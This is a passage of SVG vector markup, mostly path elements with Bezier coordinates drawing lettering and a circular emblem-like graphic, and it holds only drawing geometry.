921.1 C 307.9 921.8 311.6 923.1 313.4 920.2 C 317.5 913.4 320.1 905.8 323.6 898.6 C 325.2 894.4 328.1 890.5 328.5 886 C 326.7 884.4 324.6 883.4 322.7 882.3 Z"/>
                            <path class="st1" d="M 641.9 903.6 C 654.3 898.6 666.7 893.8 679.1 888.9 C 681.6 894.3 684.1 899.7 686.6 905.1 C 685.5 905.5 684.4 905.8 683.3 906.2 C 680.6 902.3 677.7 896.9 672.3 896.7 C 667.1 897.2 662 899.1 657.6 901.8 C 659.4 907.5 661.7 913 664 918.6 C 667.2 917.1 671 915 671.5 911.1 C 671.3 909.2 670.9 907.4 670.5 905.6 C 671.5 905.3 672.6 905 673.6 904.8 C 676.4 911.5 678.8 918.3 681.6 924.9 C 680.9 925.3 679.6 926 678.9 926.4 C 677.3 924.4 675.9 922 673.7 920.6 C 670.9 919.2 667.9 920.6 665.3 921.7 C 667.4 927.2 669.6 932.7 671.8 938.2 C 672.4 940.8 675.4 939.8 677.1 939.1 C 681.6 937.2 686.6 935.5 689.8 931.6 C 692.3 927.2 690.4 922.1 690.1 917.5 C 690.7 917.1 691.9 916.3 692.4 915.9 C 694.7 922 696.6 928.2 698.7 934.4 C 685.8 939.4 672.9 944.6 660 949.6 C 659.5 948.5 659 947.4 658.6 946.2 C 660.7 945.4 662.8 944.4 664.9 943.3 C 661.7 933.8 657.6 924.6 654.1 915.2 C 652.7 911.7 651.5 908 649.4 904.8 C 647.3 905.6 645.2 906.4 643.1 907.2 C 642.6 906 642.3 904.8 641.9 903.6 Z"/>
                            <path class="st1" d="M 371.8 900.4 C 385 904.1 398.2 908 411.4 911.6 C 409.8 917.8 408.4 924 407.2 930.3 C 406.4 930.2 404.8 929.9 404.1 929.7 C 404.8 925.9 404.9 922 404.6 918.2 C 404.1 913.7 399.4 910.5 395.1 910.7 C 393.3 913 393 916.1 392.2 918.8 C 389.6 927.9 387.1 937.1 384.4 946.2 C 383.9 947.8 383.8 949.4 383.6 951 C 385.9 951.8 388.3 952.5 390.7 953.2 C 390.3 954.4 389.9 955.5 389.5 956.7 C 381.9 954.6 374.3 952.5 366.8 950.2 C 367.2 949.1 367.6 947.9 368 946.8 C 370.2 947.4 372.5 948 374.8 948.6 C 377.1 945.3 377.6 941.3 378.7 937.6 C 381.5 927.8 384.6 918 386.8 908 C 383.6 906.9 379.9 905.5 376.8 907.5 C 372.5 910.2 371.4 915.5 368.6 919.3 C 367.9 919.2 366.5 919.1 365.8 919 C 367.6 912.8 369.5 906.5 371.8 900.4 Z"/>
                            <path class="st1" d="M 618.8 909.9 C 625.9 908.1 632.9 905.7 640.1 904 C 640.4 905.1 640.7 906.3 641 907.4 C 638.8 908.1 636.7 908.8 634.6 909.7 C 635.6 916.2 637.9 922.4 639.6 928.7 C 641.6 935.3 643 942.2 645.6 948.6 C 647.6 950.1 650.2 948.2 652.5 948.1 C 652.7 949 653.2 950.7 653.5 951.5 C 646.3 953.6 639.1 955.5 631.9 957.5 C 631.8 956.6 631.4 954.9 631.3 954.1 C 633.5 953.2 635.7 952.5 637.7 951.3 C 636.1 945 634.3 938.8 632.5 932.6 C 625.3 934.7 618.1 936.7 610.9 938.8 C 613.2 945.1 614 952.1 617.3 958 C 619.3 957.4 621.3 956.8 623.2 956.2 C 623.6 957.4 624 958.6 624.4 959.9 C 617.3 961.8 610.2 964 603.1 966 C 602.7 964.8 602.3 963.6 601.9 962.5 C 604.2 961.9 606.6 961.1 608.5 959.6 C 604.6 946.5 601.5 933.2 597 920.4 C 594.8 920.9 592.7 921.4 590.6 922 C 590.3 920.8 589.9 919.7 589.6 918.5 C 596.6 916.4 603.7 914.7 610.7 912.4 C 611.1 913.5 611.4 914.6 611.8 915.8 C 609.6 916.6 607.5 917.4 605.3 918.3 C 606.3 924.1 608.4 929.6 609.9 935.2 C 616.9 932.9 624.2 931.1 631.3 929 C 629.7 923.3 628.4 917.5 626.1 912.1 C 623.9 912.6 621.7 913.2 619.6 913.8 C 619.3 912.3 619.1 911.1 618.8 909.9 Z"/>
                            <path class="st1" d="M 448.2 53 C 463.2 51.9 478.2 50.5 493.2 49.5 C 494.4 55.8 494.5 62.3 495.8 68.6 C 494.7 69 493.6 69.5 492.4 69.9 C 490.5 65.3 489.7 59.7 485.4 56.6 C 480.7 54 475 54.7 469.8 55.2 C 468.1 55.5 465.6 55.8 465.6 58 C 465.9 64.1 466.5 70.1 467.1 76.2 C 470.3 76 473.8 75.5 476.1 73.1 C 478 70.7 478.1 67.6 478.7 64.7 C 479.5 64.7 481.1 64.7 482 64.7 C 482.7 72.9 483.1 81.1 484.1 89.2 C 483.1 89.2 481.2 89.2 480.2 89.2 C 479.6 86.7 479.3 83.9 477.1 82.2 C 474.6 79.6 470.8 79.8 467.5 79.8 C 467.8 86.6 468.3 93.5 469.1 100.3 C 469.1 102.8 472.2 103.1 474.1 102.8 C 479.5 102.2 485.4 102.3 490.1 99.1 C 494.6 95.3 494.4 88.9 495.5 83.6 C 496.6 83.4 497.7 83.2 498.8 83.1 C 498.7 90.2 499.1 97.4 499.4 104.5 C 483.8 105.8 468.1 106.9 452.4 108.2 C 452.4 106.9 452.4 105.5 452.4 104.2 C 454.9 103.7 458.3 104.5 460 102 C 458.8 86.9 458.3 71.7 456.3 56.7 C 453.8 56.5 451.3 56.7 448.8 56.9 C 448.6 55.7 448.4 54.3 448.2 53 Z"/>
                            <path class="st1" d="M 548 922.6 C 561.6 920.8 575.2 919.4 588.8 917.4 C 590.1 923.8 591 930.2 592.3 936.6 C 591.5 936.6 590.1 936.7 589.3 936.7 C 588 932.6 586.7 928.4 584.3 924.8 C 581.5 921.5 576.7 921.5 572.9 922.9 C 573.8 931.3 575.2 939.6 575.9 948 C 576.9 953.5 576.9 959.1 578.6 964.5 C 581 964.4 583.4 964.2 585.8 964.2 C 585.9 965 586.2 966.7 586.4 967.5 C 578.6 968.6 570.8 969.7 563 970.5 C 562.8 969.6 562.6 967.9 562.4 967 C 565 966.6 567.5 966.1 570.1 965.5 C 569.5 955.5 567.6 945.7 566.5 935.7 C 565.8 931.8 566 927.6 564.3 923.9 C 560.8 923.7 556.7 924.7 554.9 928 C 552.7 932.2 552.7 937 552.5 941.6 C 551.5 941.6 550.5 941.6 549.5 941.6 C 549.2 935.3 548.5 928.9 548 922.6 Z"/>
                            <path class="st3" d="M 359.2 88 C 364.3 93.7 369.1 99.6 374.2 105.1 C 368.8 106.9 363.4 108.8 358 110.5 C 358.4 103 358.8 95.5 359.2 88 Z"/>
                            <path class="st4" d="M 513.6 239.9 C 524.4 272.5 534.9 305.2 545.5 337.9 C 546.3 340.3 547.1 342.6 547.9 345 C 549 348.4 550 351.7 551.1 355.1 C 551.6 356.5 552.1 357.9 552.6 359.3 C 556.2 370.9 560 382.4 563.7 393.9 C 564.2 395.3 564.6 396.7 565.1 398.1 C 569.6 411.8 574 425.6 578.5 439.2 C 578.9 440.6 579.4 441.9 579.8 443.3 C 584.1 456.5 588.4 469.7 592.6 482.9 C 593.1 484.3 593.5 485.7 594 487.1 C 596.4 494.9 599.1 502.5 601.4 510.2 L 601 511.8 L 601.8 511.1 C 603 514.9 604.4 518.6 605.7 522.4 C 607.8 530.2 610.6 537.9 613.1 545.6 C 613.6 547.2 614.1 548.9 614.7 550.5 C 615.7 553.8 616.8 557.1 617.9 560.3 C 595.5 573.6 573.4 587.3 550.8 600.2 C 543 590 534.1 580.7 525.7 571 C 521.9 566.5 517.9 562.2 513.9 557.9 L 513.5 557.4 C 513 532.5 513.4 507.7 513.3 482.8 C 513.3 409.2 513.3 335.5 513.3 261.8 C 513.3 256 513.8 250.1 512.1 244.4 L 512 243.9 C 512.6 242.8 513 241.3 513.6 239.9 Z"/>
                            <path class="st4" d="M 601.4 582.4 C 608 578.6 614.2 574.1 621.2 571 C 624.7 581.3 627.8 591.7 631.4 601.9 C 632.2 604.7 633 607.4 633.8 610.2 L 635.1 610 L 633.2 610.5 L 634.3 611.1 C 636.5 618.4 638.9 625.7 641.3 633 C 641.8 634.6 642.3 636.2 642.8 637.7 C 654.1 672.5 665.6 707.2 676.6 742.1 C 672.9 739.4 669.8 736.2 667 732.7 C 633.5 694.5 600.1 656.3 566.7 618.1 C 563.5 614.3 560.2 610.6 556.5 607.4 C 571.9 599.7 586.8 591.3 601.4 582.4 Z"/>
                            <path class="st1" d="M 96.9 306.8 C 98.1 307.4 99.3 308 100.5 308.6 C 99.8 311.2 96.2 315.4 100 317.2 C 113 323.1 125.9 329.2 139.1 334.7 C 142.1 334.1 142.4 330.2 143.8 328 C 145.1 328.6 146.3 329.2 147.6 329.8 C 143.9 337.4 140.6 345.3 137 352.9 C 135.8 352.3 134.6 351.7 133.3 351.2 C 134.3 348.6 135.9 346.1 135.5 343.2 C 121.6 337.1 108 330.3 93.9 324.7 C 92.4 326.8 91.3 329.2 90.2 331.6 C 89 331.1 87.7 330.6 86.5 330 C 89.9 322.2 93.4 314.5 96.9 306.8 Z"/>
                            <path class="st1" d="M 450.6 919.5 C 458.2 917.9 466.8 920 472.1 925.9 C 481.6 936.1 480.8 953.5 471.6 963.6 C 463.5 972.7 447.9 973.2 439.2 964.7 C 425 952 431.2 923.3 450.6 919.5 M 451.4 923.4 C 446 925.7 443.4 931.5 442.2 936.9 C 440.6 944.6 439.1 953.1 442.7 960.5 C 446.5 968.7 460.1 969.6 464.6 961.5 C 469.6 953 470.5 942.5 469.1 933 C 468 925 458.5 920.5 451.4 923.4 Z"/>
                            <path class="st5" d="M 642.2 334 C 658.4 332.4 674.9 332 691.1 333.8 C 705.9 335.7 721.2 339.5 733.1 349 C 743 356.9 748.8 369.4 748.7 382 C 749.5 399 743.5 415.4 736.7 430.7 C 732.8 438.9 728.6 447.1 723.8 454.9 C 723.2 456.1 721.7 456.5 720.6 457.1 C 727.3 444.6 734.2 432.2 738.4 418.6 C 743.1 405.1 745.9 390.2 742.3 376.1 C 739.6 365 731.9 355.6 722.2 349.8 C 709.5 342.2 694.5 339.5 680 338.6 C 669 337.6 657.9 338.5 646.9 339.6 C 627 341.8 607.1 345.7 588 351.6 C 584.6 350.4 581.4 349.1 578.2 347.4 C 598.8 340.2 620.5 336.3 642.2 334 Z"/>
                            <path class="st6" d="M 351.5 437.6 C 375.5 386 425.6 347.1 481.9 338 C 481.4 339.5 481 341 480.5 342.5 C 474.6 343.6 468.7 345.1 463 346.9 C 467.1 350.3 471.6 353.2 476.3 355.8 C 476 357.1 475.7 358.4 475.4 359.7 L 474.7 358.4 L 474.6 358.9 C 470.2 363 467.2 368.2 463.9 373.1 C 460.1 378.9 456.8 385 453.4 391 C 456.8 392.1 460.2 393.2 463.7 394.2 C 463.2 395.7 462.7 397.1 462.2 398.5 C 458.6 397.3 455.1 396.1 451.5 394.8 C 444.9 407.9 439.6 421.8 435.3 435.8 C 439.8 437.2 444.3 438.4 448.9 439.4 C 448.4 440.9 448 442.3 447.5 443.8 C 443 442.7 438.5 441.4 434.1 440.2 C 430.3 453.8 427.7 467.6 425.9 481.6 C 428.9 482.2 431.8 482.7 434.8 483.2 C 434.3 484.7 433.8 486.1 433.3 487.6 C 430.7 487 428.1 486.4 425.5 485.8 C 424.6 495.1 423.3 504.4 424.7 513.7 C 423.7 518.7 421.9 523.4 420.1 528.1 C 419.9 524.3 419.6 520.5 419.5 516.7 C 404.6 516.7 389.6 516.7 374.7 516.7 C 375.1 530.2 376.3 543.7 379.3 556.9 C 390.8 552.4 402.6 548.6 414.6 545.4 C 414.1 547.6 413.3 549.6 412.5 551.7 L 412 551.5 C 410.3 550.9 408.6 551.6 407 551.9 C 398 554.8 389 557.7 380.2 561.1 C 383.8 575.6 388.6 589.8 395.6 603 L 395.3 603.7 L 396.3 603.3 C 395.4 605.5 394.5 607.6 393.6 609.8 L 393.9 609.9 L 393.6 610.1 C 387.4 613.5 381.6 617.5 376.1 621.9 C 379.2 625.8 382.5 629.7 386.1 633.3 C 385.6 634.8 385 636.3 384.4 637.8 C 350.1 603.2 332 553.6 334.9 505.1 C 335.6 501.1 336 497.1 336 493.1 C 337.5 473.9 343.3 455.1 351.5 437.6 M 442.5 354.4 C 433.2 358.6 424.2 363.4 415.8 369.2 C 418.9 371.6 422 374 425.2 376.4 C 435.5 365.8 447.4 356.9 459.5 348.3 C 453.5 349.4 448 352 442.5 354.4 M 429.1 378.9 C 435.5 382.9 442.3 386.3 449.3 389.2 C 455.4 378.1 461.8 367.2 469.5 357.1 C 467.2 355.5 464.9 353.8 462.6 352.1 C 450.3 359.5 439.2 368.7 429.1 378.9 M 376.1 406.1 C 381.7 410.9 388.1 414.9 394.4 418.8 C 402.1 404.7 411.5 391.5 422.3 379.6 C 418.8 377.1 415.4 374.5 412.1 371.8 C 398.5 381.5 386.3 393 376.1 406.1 M 398.2 420.7 C 408.7 426.4 419.8 431.1 431.3 434.5 C 435.3 420.2 441 406.6 447.3 393.2 C 440 389.9 432.7 386.5 426 382.2 C 415.2 393.8 406 406.8 398.2 420.7 M 373.3 409.6 C 363.7 422.7 355.6 437 350 452.4 C 358.6 457.2 367.3 461.7 376.4 465.5 C 380.2 450.7 385.4 436.2 392.4 422.6 C 385.7 418.8 379.4 414.4 373.3 409.6 M 396.3 424.8 C 389.2 438.2 384.2 452.5 380.5 467.1 C 393.9 472.5 407.7 476.9 421.8 480.2 C 423.6 466.2 426.2 452.3 430 438.8 C 418.5 435 407.1 430.5 396.3 424.8 M 348.3 456.7 C 342.2 474.6 338.9 493.5 338.6 512.5 C 349.2 512.5 359.8 512.5 370.4 512.5 C 370.9 498.2 372.2 483.8 375.5 469.9 C 366.1 466.1 357.2 461.3 348.3 456.7 M 379.4 471.5 C 376.6 485 375 498.7 374.9 512.5 C 389.8 512.5 404.7 512.5 419.6 512.5 C 420 503.2 420.4 493.9 421.4 484.7 C 407 481.3 393 476.8 379.4 471.5 M 338.5 516.6 C 339 535.4 342.3 554 348.3 571.8 C 356.9 566.9 365.8 562.4 375.1 558.7 C 372.1 544.9 370.8 530.8 370.4 516.7 C 359.8 516.5 349.1 516.5 338.5 516.6 M 350 576 C 355.8 591.1 363.6 605.5 373.3 618.5 C 379.2 613.9 385.5 609.7 392 605.8 C 384.9 592.2 379.8 577.7 376.2 562.9 C 367.2 566.7 358.4 571 350 576 Z"/>
                            <path class="st6" d="M 545.5 337.9 C 556.6 340 567.8 342.6 578.1 347.3 C 581.2 349 584.5 350.3 587.9 351.5 C 602.5 357.4 615.7 366.3 627.8 376.2 C 668.1 409.3 692.9 461 692.3 513.3 C 693.1 559.1 674.7 604.8 642.9 637.8 C 642.4 636.2 641.9 634.6 641.4 633.1 C 644.5 629.6 647.5 626.1 650.6 622.5 C 645.5 618.3 640.3 614.3 634.4 611.2 L 633.3 610.6 L 635.2 610.1 L 633.9 610.3 C 633.1 607.5 632.2 604.8 631.5 602 C 637.7 589 642.6 575.5 646 561.6 C 645.3 561.2 643.9 560.3 643.1 559.8 C 646 558.1 648.9 556.4 651.8 554.6 C 651.6 556 651.4 557.4 651.2 558.7 C 660.5 562.7 669.6 567.2 678.4 572.2 C 684.4 554.3 688 535.5 688.2 516.5 C 677.4 516.5 666.6 516.5 655.8 516.5 C 655.6 519.8 655.4 523.1 655.3 526.4 C 653.9 527.8 652.5 529.2 651.1 530.6 C 651.2 525.9 651.4 521.2 651.4 516.5 C 636.4 516.5 621.3 516.5 606.3 516.5 C 606.1 518.5 605.9 520.5 605.8 522.5 C 604.5 518.7 603.1 515 601.9 511.2 L 601.1 511.9 L 601.5 510.3 C 602.7 502.1 601 493.9 600.5 485.7 C 598.3 486.2 596.2 486.7 594 487.2 C 593.5 485.8 593.1 484.4 592.6 483 C 595.1 482.5 597.5 482 600 481.5 C 598.5 467.5 595.6 453.7 591.9 440.2 C 587.9 441.3 583.8 442.3 579.8 443.4 C 579.4 442 578.9 440.7 578.5 439.3 C 582.6 438.3 586.7 437.2 590.8 436.1 C 586.4 422.1 581.3 408.2 574.6 395.1 C 571.4 396.1 568.2 397.2 565 398.2 C 564.5 396.8 564.1 395.4 563.6 394 C 566.6 393.1 569.6 392.1 572.5 391.2 C 566.7 380.1 560.1 369.4 552.5 359.4 C 552 358 551.5 356.6 551 355.2 C 555.3 352.6 559.5 349.8 563.4 346.7 C 558 345.2 552.5 343.8 547 342.6 C 547.2 343.2 547.6 344.5 547.8 345.2 C 547.1 342.6 546.3 340.3 545.5 337.9 M 567.1 348 C 568.2 349.2 569.1 350.6 570.5 351.5 C 581.6 358.7 591.8 367.3 600.9 376.9 C 604.3 374.5 607.7 372 611 369.4 C 597.6 360.1 582.8 352.6 567.1 348 M 556.6 357 C 564.1 367.3 570.9 378.1 576.8 389.5 C 583.9 386.6 590.8 383.2 597.4 379.1 C 587.2 369 575.9 359.9 563.9 352.1 C 561.4 353.7 559 355.4 556.6 357 M 604.2 380 C 614.9 392 624.3 405 631.9 419.1 C 638.6 415.4 644.9 411 650.9 406.2 C 640.7 393 628.3 381.6 614.9 371.7 C 611.4 374.6 607.8 377.3 604.2 380 M 578.9 393.4 C 585.2 406.8 590.8 420.6 595 434.8 C 606.4 431.3 617.5 426.8 628 421.2 C 620.4 407.2 611.2 394 600.3 382.5 C 593.5 386.8 586.3 390.3 578.9 393.4 M 633.9 423.1 C 640.8 436.6 646.1 451 649.7 465.7 C 659 461.7 668.1 457.2 676.8 452.1 C 671 437 663.2 422.8 653.6 409.8 C 647.3 414.6 640.8 419.1 633.9 423.1 M 596.1 439 C 600.1 452.6 602.3 466.5 604.6 480.4 C 618.6 477 632.4 472.6 645.8 467.4 C 642.2 452.8 636.9 438.7 630.3 425.2 C 619.2 430.7 607.8 435.4 596.1 439 M 650.8 470 C 653.5 483.9 655.7 498 655.3 512.3 C 666.2 512.8 677.2 512.4 688.1 512.5 C 688.1 493.4 684.5 474.4 678.4 456.4 C 669.5 461.5 660.3 466 650.8 470 M 604.9 484.8 C 605.7 494 606.4 503.2 606.2 512.4 C 621.3 512.4 636.3 512.4 651.4 512.4 C 651.4 498.7 649.6 485.1 646.7 471.8 C 633 476.9 619.1 481.4 604.9 484.8 M 650 563.1 C 646.3 577.9 641 592.2 634.4 605.9 C 641 609.7 647.4 613.9 653.3 618.7 C 663 605.8 670.8 591.5 676.7 576.5 C 668.2 571.4 659.2 566.9 650 563.1 Z"/>
                            <path class="st7" d="M 463 346.9 C 468.7 345 474.6 343.6 480.5 342.5 C 479 346.9 477.4 351.3 476.3 355.8 C 471.6 353.2 467.1 350.2 463 346.9 Z"/>
                            <path class="st7" d="M 547.1 342.5 C 552.6 343.7 558.1 345.1 563.5 346.6 C 559.6 349.7 555.4 352.5 551.1 355.1 C 550 351.7 549 348.3 547.9 345 C 547.7 344.4 547.3 343.1 547.1 342.5 Z"/>
                            <path class="st8" d="M 464 373 C 467.2 368 470.3 362.8 474.7 358.8 C 471.8 370.8 467.1 382.2 463.8 394.1 C 460.3 393.1 456.9 392 453.5 390.9 C 456.9 384.8 460.2 378.8 464 373 Z"/>
                            <path class="st7" d="M 425.6 485.6 C 428.2 486.2 430.8 486.8 433.4 487.4 C 430.3 496 427.8 504.9 424.7 513.5 C 423.4 504.2 424.7 494.9 425.6 485.6 Z"/>
                            <path class="st7" d="M 564.2 663.1 C 567.5 665.6 570.9 668 574.2 670.5 C 570.9 672.7 567.5 674.9 564.2 677.1 C 562 675.6 559.9 674 557.7 672.5 C 559.9 669.3 562.1 666.2 564.2 663.1 Z"/>
                            <path class="st7" d="M 567.1 348 C 582.8 352.6 597.6 360.1 611.1 369.3 C 607.8 371.9 604.4 374.4 601 376.8 C 591.9 367.2 581.7 358.6 570.6 351.4 C 569.1 350.6 568.2 349.2 567.1 348 Z"/>
                            <path class="st7" d="M 442.5 354.4 C 448 352 453.5 349.4 459.5 348.4 C 447.5 357 435.6 365.8 425.2 376.5 C 422 374.1 418.9 371.7 415.8 369.3 C 424.2 363.4 433.3 358.6 442.5 354.4 Z"/>
                            <path class="st9" d="M 552.6 359.4 C 560.2 369.4 566.9 380 572.6 391.2 C 569.6 392.2 566.7 393.1 563.7 394 C 560 382.4 556.2 370.9 552.6 359.4 Z"/>
                            <path class="st7" d="M 376 622 C 381.5 617.6 387.3 613.6 393.5 610.2 C 390.6 617.8 388.5 625.7 385.9 633.4 C 382.4 629.7 379.1 625.9 376 622 Z"/>
                            <path class="st7" d="M 452.5 670.9 C 455.7 668.3 459 666 462.4 663.7 C 464.2 666.5 466.1 669.2 468 671.9 C 465.8 673.5 463.5 675.1 461.3 676.8 C 458.4 674.8 455.5 672.9 452.5 670.9 Z"/>
                            <path class="st7" d="M 556.6 357 C 559 355.4 561.4 353.7 563.9 352.1 C 576 360 587.2 369 597.4 379.1 C 590.9 383.2 583.9 386.5 576.8 389.5 C 570.9 378.1 564.1 367.3 556.6 357 Z"/>
                            <path class="st7" d="M 429.1 378.9 C 439.2 368.7 450.3 359.5 462.6 352.2 C 464.9 353.9 467.2 355.5 469.5 357.2 C 461.8 367.3 455.4 378.2 449.3 389.3 C 442.4 386.3 435.6 382.9 429.1 378.9 Z"/>
                            <path class="st7" d="M 376.1 406.1 C 386.3 393 398.5 381.5 412 371.8 C 415.3 374.5 418.7 377.1 422.2 379.6 C 411.5 391.6 402 404.7 394.3 418.8 C 388.1 414.9 381.8 411 376.1 406.1 Z"/>
                            <path class="st7" d="M 604.2 380 C 607.8 377.3 611.4 374.6 614.9 371.8 C 628.3 381.7 640.7 393.1 650.9 406.3 C 644.9 411.1 638.6 415.4 631.9 419.2 C 624.3 405 614.9 392 604.2 380 Z"/>
                            <path class="st7" d="M 398.2 420.7 C 406 406.8 415.2 393.8 426 382.1 C 432.8 386.4 440 389.9 447.3 393.1 C 441 406.5 435.3 420.2 431.3 434.4 C 419.9 431.1 408.8 426.4 398.2 420.7 Z"/>
                            <path class="st7" d="M 578.9 393.4 C 586.3 390.3 593.5 386.8 600.3 382.5 C 611.2 394.1 620.5 407.2 628 421.2 C 617.5 426.8 606.3 431.2 595 434.8 C 590.7 420.6 585.2 406.8 578.9 393.4 Z"/>
                            <path class="st7" d="M 435.4 435.7 C 439.8 421.7 445 407.8 451.6 394.7 C 455.1 396 458.7 397.2 462.3 398.4 C 457.7 412 453.3 425.6 449 439.3 C 444.4 438.3 439.8 437.1 435.4 435.7 Z"/>
                            <path class="st7" d="M 565.1 398.2 C 568.3 397.2 571.5 396.1 574.7 395.1 C 581.4 408.2 586.4 422.1 590.9 436.1 C 586.8 437.2 582.7 438.3 578.6 439.3 C 574 425.6 569.6 411.9 565.1 398.2 Z"/>
                            <path class="st7" d="M 373.3 409.6 C 379.4 414.4 385.7 418.7 392.4 422.6 C 385.4 436.2 380.1 450.7 376.4 465.5 C 367.3 461.7 358.6 457.2 350 452.4 C 355.5 437.1 363.7 422.8 373.3 409.6 Z"/>
                            <path class="st7" d="M 633.9 423.1 C 640.8 419.1 647.3 414.6 653.6 409.8 C 663.2 422.8 671 437 676.8 452.1 C 668.1 457.2 659 461.7 649.7 465.7 C 646.1 451 640.8 436.6 633.9 423.1 Z"/>
                            <path class="st7" d="M 396.3 424.8 C 407.1 430.4 418.5 434.9 430 438.8 C 426.2 452.4 423.6 466.2 421.8 480.2 C 407.7 476.9 393.9 472.5 380.5 467.1 C 384.2 452.5 389.2 438.2 396.3 424.8 Z"/>
                            <path class="st7" d="M 596.1 439 C 607.9 435.4 619.2 430.7 630.2 425.2 C 636.8 438.7 642.1 452.8 645.7 467.4 C 632.3 472.6 618.5 477 604.5 480.4 C 602.3 466.5 600.1 452.5 596.1 439 Z"/>
                            <path class="st7" d="M 434.2 440 C 438.7 441.3 443.1 442.5 447.6 443.6 C 443.2 456.7 438.9 469.8 434.8 483 C 431.8 482.5 428.9 481.9 425.9 481.4 C 427.8 467.4 430.4 453.6 434.2 440 Z"/>
                            <path class="st7" d="M 579.8 443.4 C 583.8 442.4 587.9 441.3 591.9 440.2 C 595.6 453.7 598.5 467.6 600 481.5 C 597.5 482 595.1 482.5 592.6 483 C 588.4 469.8 584.1 456.6 579.8 443.4 Z"/>
                            <path class="st7" d="M 348.3 456.7 C 357.3 461.3 366.1 466.1 375.5 469.8 C 372.2 483.8 371 498.1 370.4 512.4 C 359.8 512.4 349.2 512.4 338.6 512.4 C 338.9 493.5 342.1 474.6 348.3 456.7 Z"/>
                            <path class="st7" d="M 650.8 470 C 660.3 466 669.5 461.5 678.4 456.3 C 684.5 474.4 688.1 493.3 688.1 512.4 C 677.2 512.3 666.2 512.7 655.3 512.2 C 655.8 498 653.5 483.9 650.8 470 Z"/>
                            <path class="st7" d="M 379.4 471.5 C 393.1 476.8 407.1 481.3 421.4 484.6 C 420.4 493.8 420 503.1 419.6 512.4 C 404.7 512.4 389.8 512.4 374.9 512.4 C 375 498.7 376.5 485 379.4 471.5 Z"/>
                            <path class="st7" d="M 604.9 484.8 C 619.1 481.4 633 476.9 646.7 471.8 C 649.5 485.2 651.3 498.8 651.4 512.4 C 636.3 512.4 621.3 512.4 606.2 512.4 C 606.3 503.2 605.7 494 604.9 484.8 Z"/>
                            <path class="st7" d="M 655.8 516.5 C 666.6 516.6 677.4 516.5 688.2 516.5 C 688 535.5 684.4 554.2 678.4 572.2 C 669.6 567.2 660.5 562.6 651.2 558.7 C 651.4 557.3 651.6 555.9 651.8 554.6 C 659.9 549.3 668.2 543.8 674.3 536.2 C 676.9 532.6 679.3 527.9 677.5 523.5 C 676.3 520 672.7 517.1 669 517.6 C 663.5 518.7 659.3 522.8 655.3 526.5 C 655.3 523.1 655.5 519.8 655.8 516.5 Z"/>
                            <path class="st7" d="M 338.5 516.6 C 349.1 516.6 359.7 516.6 370.4 516.6 C 370.8 530.7 372.1 544.8 375.1 558.6 C 365.9 562.3 357 566.8 348.3 571.7 C 342.3 554 339 535.3 338.5 516.6 Z"/>
                            <path class="st7" d="M 374.7 516.6 C 389.6 516.6 404.6 516.6 419.5 516.6 C 419.6 520.4 420 524.2 420.1 528 C 418.2 533.8 416.4 539.6 414.5 545.3 C 402.5 548.5 390.7 552.3 379.2 556.8 C 376.2 543.6 375.1 530.1 374.7 516.6 Z"/>
                            <path class="st7" d="M 606.2 516.5 C 621.2 516.5 636.3 516.5 651.3 516.5 C 651.2 521.2 651.1 525.9 651 530.6 C 644.1 537.4 637.6 544.5 630.3 550.8 C 624.6 549.1 618.9 547.3 613.1 545.7 C 610.6 538 607.9 530.3 605.7 522.5 C 605.9 520.6 606.1 518.5 606.2 516.5 Z"/>
                            <path class="st7" d="M 406.9 551.9 C 408.5 551.6 410.3 550.9 411.9 551.5 L 412.4 551.7 C 406.6 568.8 401.5 586.1 395.4 603.1 C 388.4 589.9 383.6 575.6 380 561.2 C 389 557.7 397.9 554.7 406.9 551.9 Z"/>
                            <path class="st7" d="M 621.2 571 C 628.6 567.6 635.9 563.7 643 559.7 C 643.7 560.1 645.1 561 645.9 561.5 C 642.5 575.4 637.6 589 631.4 601.9 C 627.9 591.7 624.8 581.3 621.2 571 Z"/>
                            <path class="st7" d="M 350 576 C 358.4 571.1 367.2 566.7 376.2 562.9 C 379.8 577.7 384.9 592.3 392 605.8 C 385.5 609.6 379.3 613.8 373.3 618.5 C 363.6 605.4 355.7 591.1 350 576 Z"/>
                            <path class="st7" d="M 650 563.1 C 659.2 566.9 668.1 571.4 676.7 576.5 C 670.7 591.5 663 605.8 653.3 618.7 C 647.4 613.9 641 609.6 634.4 605.9 C 641 592.2 646.3 577.9 650 563.1 Z"/>
                            <path class="st7" d="M 515.3 627.5 C 522.8 632.7 530 638.3 537.5 643.5 C 535.6 649.6 533.3 655.6 530.6 661.4 C 525.5 660.5 520.3 659.9 515.2 659.6 C 515.2 649 515 638.3 515.3 627.5 Z"/>
                            <path class="st7" d="M 504.3 632.7 C 506.5 631.6 508.7 630.5 511 629.5 C 511.2 639.6 511 649.7 511.1 659.8 C 505.8 659.9 500.6 660.5 495.4 661.4 C 492.9 655.8 490.8 650.2 488.7 644.4 C 494 640.6 499.2 636.8 504.3 632.7 Z"/>
                            <path class="st7" d="M 484.8 647.3 C 487.3 652.1 488.7 657.3 490.9 662.2 C 484.3 664 478 666.6 471.9 669.7 C 469.9 666.8 467.9 663.9 465.9 661 C 472.2 656.6 478.4 651.7 484.8 647.3 Z"/>
                            <path class="st7" d="M 535.1 662.4 C 537.2 657.1 539.5 651.8 541.3 646.3 C 547.6 651.2 554.2 655.8 560.7 660.5 C 558.5 663.7 556.2 666.9 553.9 670.1 C 547.9 666.9 541.6 664.4 535.1 662.4 Z"/>
                            <path class="st7" d="M 462.9 681.3 C 490.8 658.1 535.1 658.1 562.8 681.6 C 530.4 691.4 495.1 691.2 462.9 681.3 Z"/>
                            <path class="st7" d="M 567.7 680.2 C 571.1 677.8 574.5 675.5 577.9 673.1 C 578.9 673.8 579.9 674.6 580.9 675.3 C 576.6 677 572.2 678.7 567.7 680.2 Z"/>
                            <path class="st7" d="M 448.4 673.4 C 451.3 675.3 454.1 677.2 456.9 679.3 C 453.4 678.2 450.1 676.9 446.7 675.6 C 447 675.1 447.9 674 448.4 673.4 Z"/>
                            <circle style="fill: rgb(255, 255, 255); stroke-width: 2px; vector-effect: non-scaling-stroke;" cx="748.528" cy="558.574" r="3.459" transform="matrix(1.000000000001, 3e-12, 1e-12, 1.000000000003, -21.068956115586, 31.583086396936)"/>
